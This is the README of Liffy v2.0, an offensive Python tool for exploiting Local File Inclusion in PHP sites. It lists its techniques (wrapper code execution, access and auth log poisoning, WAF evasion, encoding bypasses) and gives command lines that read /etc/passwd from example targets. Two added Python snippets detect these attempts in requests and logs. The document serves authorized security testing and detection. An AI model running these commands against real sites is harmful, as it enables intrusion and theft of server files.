A powerful Python tool for Local File Inclusion (LFI) exploitation with advanced features including WAF bypass, encoding techniques, and comprehensive vulnerability detection.
Liffy v2.0 is a significantly enhanced version of liffy, which was originally created by rotlogix/liffy. This version includes modern features like Rich terminal output, YAML configuration, enhanced threading, and multiple advanced exploitation techniques.
Many of the new changes were vibe coded using Claude.
- data:// - Code execution via data wrapper
- expect:// - Code execution via expect wrapper
- input:// - Code execution via input wrapper
- filter:// - Arbitrary file reads via filter wrapper
- /proc/self/environ - Code execution in CGI mode
- Apache access.log poisoning - Log file exploitation
- Linux auth.log SSH poisoning - SSH log exploitation
- Null Byte Poisoning - Legacy PHP null byte attacks
- ZIP wrapper exploitation - ZIP file inclusion attacks
- WAF Evasion - Multiple bypass techniques for common WAFs
- Advanced Encoding - Double URL encoding, Unicode, case variations
- POST Request Support - Full POST method support with custom data
- Custom Headers - Configurable HTTP headers
- User-Agent Rotation - Randomized user agents to avoid detection
- Rate Limiting - Configurable request throttling
- Multi-threading - Enhanced thread pool management
- Detection Mode - Vulnerability scanning without exploitation
- Rich Terminal Output - Beautiful colored output with progress bars
- YAML Configuration - Persistent settings management
- Enhanced Vulnerability Detection - Advanced response analysis with confidence scoring
- Thread Pool Management - Optimized performance with adaptive threading
- Configuration Management - YAML-based settings with CLI overrides
- Comprehensive Logging - Detailed execution reports and progress tracking
Make sure you are using Python 3. Liffy doesn't support Python 2.
```bash
# Install uv if you haven't already
curl -LsSf https://astral.sh/uv/install.sh | sh

# Clone the repository
git clone https://github.com/mzfr/liffy
cd liffy

# Create virtual environment with uv
uv venv

# Activate virtual environment
source .venv/bin/activate  # On Linux/Mac
# .venv\Scripts\activate   # On Windows

# Install dependencies
uv pip install -r requirements.txt

# Run liffy
uv run python3 liffy.py --help
```
```bash
python3 liffy.py <URL> [OPTIONS]
```

```
usage: liffy.py [-h] [-d] [-i] [-e] [-f] [-p] [-a] [-ns] [-r] [--ssh]
                [-l LOCATION] [--cookies COOKIES] [-dt] [-t THREADS]
                [--detection] [--null-byte] [--zip] [--encoding]
                [--waf-bypass] [--method {GET,POST}] [--post-data POST_DATA]
                [--headers HEADERS] [--no-color] [--no-banner] [--config]
                [url]

positional arguments:
  url                       URL to test for LFI

Core Techniques:
  -d, --data                Use data:// technique
  -i, --input               Use input:// technique
  -e, --expect              Use expect:// technique
  -f, --filter              Use filter:// technique
  -p, --proc                Use /proc/self/environ technique
  -a, --access              Apache access logs technique
  --ssh                     SSH auth log poisoning
  -dt, --directorytraverse  Test for Directory Traversal
  --null-byte               Test for Null Byte Poisoning
  --zip                     Test for ZIP wrapper exploitation

Advanced Options:
  --encoding                Use advanced encoding/bypass techniques
  --waf-bypass              Use WAF evasion techniques
  --method {GET,POST}       HTTP method to use (default: GET)
  --post-data POST_DATA     POST data (format: key=value&key2=value2)
  --headers HEADERS         Custom headers (format: Header1:Value1,Header2:Value2)
  --detection               Only perform LFI detection, no exploitation

General Options:
  -ns, --nostager           Execute payload directly, do not use stager
  -r, --relative            Use path traversal sequences for attack
  -l, --location LOCATION   Path to target file (access log, auth log, etc.)
  --cookies COOKIES         Session cookies for authentication
  -t, --threads THREADS     Number of threads to use (default: 5)
  --no-color                Disable colored output
  --no-banner               Disable banner display
  --config                  Create default YAML configuration file
```
Create a configuration file for persistent settings:
```bash
python3 liffy.py --config
```

This creates `liffy_config.yaml` with default settings:

```yaml
# Liffy Configuration File
max_threads: 5
rate_limit_delay: 0.1
disable_colors: false
disable_banner: false
default_method: GET
user_agent_rotation: true
```
You can also use environment variables:
- `LIFFY_THREADS` - Number of threads
- `LIFFY_RATE_LIMIT` - Rate limit delay
- `LIFFY_NO_COLOR` - Disable colors (true/false)
When `--waf-bypass` is enabled, liffy automatically applies multiple evasion techniques:
- Comment Injection: `/**/`, `#`, `;`
- Protocol Confusion: `file:///`, `pHp://`
- Encoding Layering: Multiple encoding combinations
- Path Obfuscation: `./`, `../`, null bytes
With `--encoding`, liffy applies advanced encoding methods:
- Double URL Encoding: `%252e%252e%252f`
- Unicode Encoding: `\u002e\u002e\u002f`
- Mixed Case: `..%2F`, `..%2f`
- HTML Entity Encoding: `../`
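A defender-side view of the encodings listed above, added here as an example (it is not part of liffy): the detector decodes a request target repeatedly until it stops changing, then matches the traversal sequences, wrappers and log paths this README names. The rule names, function names and `SAMPLE_LOG` lines are constructed for illustration.

```python
import html
import re
from urllib.parse import unquote

# \u002e and %u002e escapes; percent and HTML-entity forms are handled by the stdlib.
UNICODE_ESC = re.compile(r"(?:\\u|%u)([0-9a-fA-F]{4})")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Rule names are this example's own; the patterns come from the README's lists.
RULES = {
    "traversal": re.compile(r"\.\.[/\\]"),
    "wrapper": re.compile(r"\b(?:php|data|expect|zip|file)://"),
    "null_byte": re.compile(r"\x00"),
    "sensitive_path": re.compile(
        r"/etc/passwd|/proc/self/environ|/var/log/(?:auth\.log|apache2/access\.log|httpd/access_log)"),
}

def normalize(value, max_rounds=5):
    """Decode until stable; return (lower-cased value, number of decoding layers)."""
    layers = 0
    while layers < max_rounds:
        decoded = unquote(value)  # %2e, and %252e on the following round
        decoded = UNICODE_ESC.sub(lambda m: chr(int(m.group(1), 16)), decoded)
        decoded = html.unescape(decoded)  # &#46; style entities
        if decoded == value:
            break
        value, layers = decoded, layers + 1
    return value.lower(), layers  # lower-casing neutralises pHp:// style case mixing

def analyze(request_target):
    """Return the names of the rules that fire on the fully decoded target."""
    normalized, layers = normalize(request_target)
    hits = sorted(name for name, rx in RULES.items() if rx.search(normalized))
    if hits and layers >= 2:
        hits.append("layered_encoding")  # more than one decoding pass was needed
    return hits

def scan_access_log(lines):
    # Yields (client_ip, hits) for each log line whose request trips a rule.
    for line in lines:
        match = REQUEST.search(line)
        hits = analyze(match.group(1)) if match else []
        if hits:
            yield line.split(" ", 1)[0], hits

# Constructed sample lines in Apache combined log format.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2025:10:00:00 +0000] "GET /page.php?file=about.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Jan/2025:10:01:00 +0000] "GET /page.php?file=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1547 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Jan/2025:10:02:00 +0000] "GET /page.php?file=pHp://filter/resource=index.php HTTP/1.1" 200 90 "-" "Mozilla/5.0"',
    '203.0.113.20 - - [01/Jan/2025:10:03:00 +0000] "GET /page.php?file=..%2F..%2fetc/passwd%00 HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]
```

Matching only after the value has stopped changing is what makes the double-encoded and mixed-case forms equivalent to the plain ones; a filter that decodes once sees `%2e%2e%2f` and passes it.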
```bash
# POST with form data
python3 liffy.py "http://target.com/lfi.php" -d --method POST --post-data "file=../../etc/passwd"

# POST with custom headers
python3 liffy.py "http://target.com/lfi.php" -d --method POST --headers "X-Forwarded-For:127.0.0.1,Authorization:Bearer token123"
```

```bash
python3 liffy.py "http://example.com/page.php?file=" -d

python3 liffy.py "http://example.com/page.php?file=" -d -i -e -f

python3 liffy.py "http://example.com/page.php?file=" --detection -d -i -e

python3 liffy.py "http://example.com/page.php?file=" -d --waf-bypass --encoding

python3 liffy.py "http://example.com/page.php?file=" -d -t 10 --config

python3 liffy.py "http://example.com/upload.php" -d --method POST \
    --post-data "action=read&file=../../etc/passwd" \
    --headers "User-Agent:Mozilla/5.0,X-Forwarded-For:192.168.1.1"

python3 liffy.py "http://example.com/page.php?file=" -a

python3 liffy.py "http://example.com/page.php?file=" --ssh

python3 liffy.py "http://example.com/page.php?file=" -a -l "/var/log/apache2/access.log"

python3 liffy.py "http://example.com/page.php?file=" -d -r

python3 liffy.py "http://example.com/page.php?file=" -dt

python3 liffy.py "http://example.com/page.php?file=" --null-byte

python3 liffy.py "http://example.com/page.php?file=" --zip

python3 liffy.py "http://example.com/page.php?file=" \
    -d -i -e -f -p -a --ssh -dt --null-byte --zip \
    --encoding --waf-bypass --detection

python3 liffy.py "http://example.com/page.php?file=" -d \
    --cookies "PHPSESSID=abc123; auth_token=xyz789"

python3 liffy.py "http://example.com/page.php?file=" -d --no-color --no-banner
```
The following default locations are used when no custom path is specified:
- SSH auth.log: `/var/log/auth.log`
- Apache access.log: `/var/log/apache2/access.log`
- Alternative Apache log: `/var/log/httpd/access_log`
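For the two log-poisoning techniques, the files above are also where the attempt leaves its trace. The following added example (not liffy code) reports which client-controlled field of an Apache access log or sshd auth log line carries a PHP open tag; the regular expressions assume the Apache combined format and standard sshd failure messages, and the sample lines are constructed.

```python
import re

# PHP open tags: "<?php" and the short echo tag "<?=".
PHP_TAG = re.compile(r"<\?(?:php|=)", re.IGNORECASE)

# Apache combined format: the request line, referer and user agent are client-supplied.
ACCESS = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>.*?)" \d{3} \S+ '
    r'"(?P<referer>.*?)" "(?P<user_agent>.*)"$')

# sshd failed-login messages: the user name is client-supplied.
AUTH = re.compile(
    r"sshd\[\d+\]: (?:Invalid user|Failed password for(?: invalid user)?) "
    r"(?P<user>.*) from (?P<ip>\S+) port \d+")

def find_poisoning(lines):
    """Return (source_ip, field) for every client-supplied field holding a PHP tag."""
    findings = []
    for line in lines:
        match = ACCESS.match(line) or AUTH.search(line)
        if not match:
            continue  # unrelated line, e.g. a successful login
        for field, value in match.groupdict().items():
            if field != "ip" and PHP_TAG.search(value):
                findings.append((match.group("ip"), field))
    return findings

# Constructed sample lines: two from an access log, two from an auth log.
SAMPLE_LINES = [
    '198.51.100.7 - - [01/Jan/2025:10:00:00 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Jan/2025:10:05:00 +0000] "GET / HTTP/1.1" 200 512 "-" "<?php echo 1; ?>"',
    "Jan  1 10:05:30 web01 sshd[4100]: Accepted password for alice from 198.51.100.7 port 50000 ssh2",
    "Jan  1 10:06:00 web01 sshd[4242]: Invalid user <?php echo 1; ?> from 203.0.113.9 port 51234",
]

if __name__ == "__main__":
    for ip, field in find_poisoning(SAMPLE_LINES):
        print(f"{ip}: PHP tag in {field}")
```

A hit here is only the first half of the technique; it becomes exploitable when the web server's user can read the log and an include reaches it, so keeping these files unreadable to that user removes the second half.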
We welcome contributions! Here's how you can help:
- New LFI exploitation techniques
- Additional WAF bypass methods
- Enhanced encoding techniques
- Payload optimization
- Detection improvements
- Report issues via GitHub Issues
- Include detailed reproduction steps
- Provide target environment details
- Fork the repository
- Create a feature branch
- Make your changes with tests
- Submit a pull request
Feel free to open an issue for any questions or suggestions!
Liffy's detection mode provides comprehensive vulnerability analysis:
- High Confidence (80-100%): Strong indicators like `/etc/passwd` content
- Medium Confidence (50-79%): Partial file content or suspicious responses
- Low Confidence (20-49%): Potential indicators requiring manual verification
- File Content Analysis: Recognizes Linux, Windows, and PHP file patterns
- Response Analysis: HTTP status codes, content length, timing analysis
- WAF Detection: Identifies common WAF signatures
- Evidence Collection: Captures proof of vulnerability for reporting
```
[+] VULNERABILITY SUMMARY
==================================================
[1] Vulnerability Found
    Payload: ../../etc/passwd
    Confidence: 85%
    Evidence: Linux /etc/passwd file: root:
    Status Code: 200
    Content Length: 1547
```
```bash
# Use WAF bypass techniques
python3 liffy.py "http://target.com/lfi.php" -d --waf-bypass

# Reduce thread count and increase delays
python3 liffy.py "http://target.com/lfi.php" -d -t 1
```

```yaml
# Increase delay in config file
max_threads: 2
rate_limit_delay: 1.0
```
For verbose output, you can modify the configuration:
```yaml
debug_mode: true
verbose_output: true
```
Liffy is designed for authorized security testing only.
- Only use on systems you own or have explicit permission to test
- Follow responsible disclosure practices
- Respect rate limits and avoid DoS conditions
- Be aware of legal implications in your jurisdiction
The authors are not responsible for misuse of this tool.
- Original liffy by hvqzao
- Initial concept from rotlogix/liffy
- LFI exploitation techniques from various security research
- WAF bypass methods from public security resources
- PHP wrapper exploitation documentation
- Logo design from renderforest
- Terminal styling using Rich library
This project is licensed under the GNU General Public License v3.0 - see the LICENSE file for details.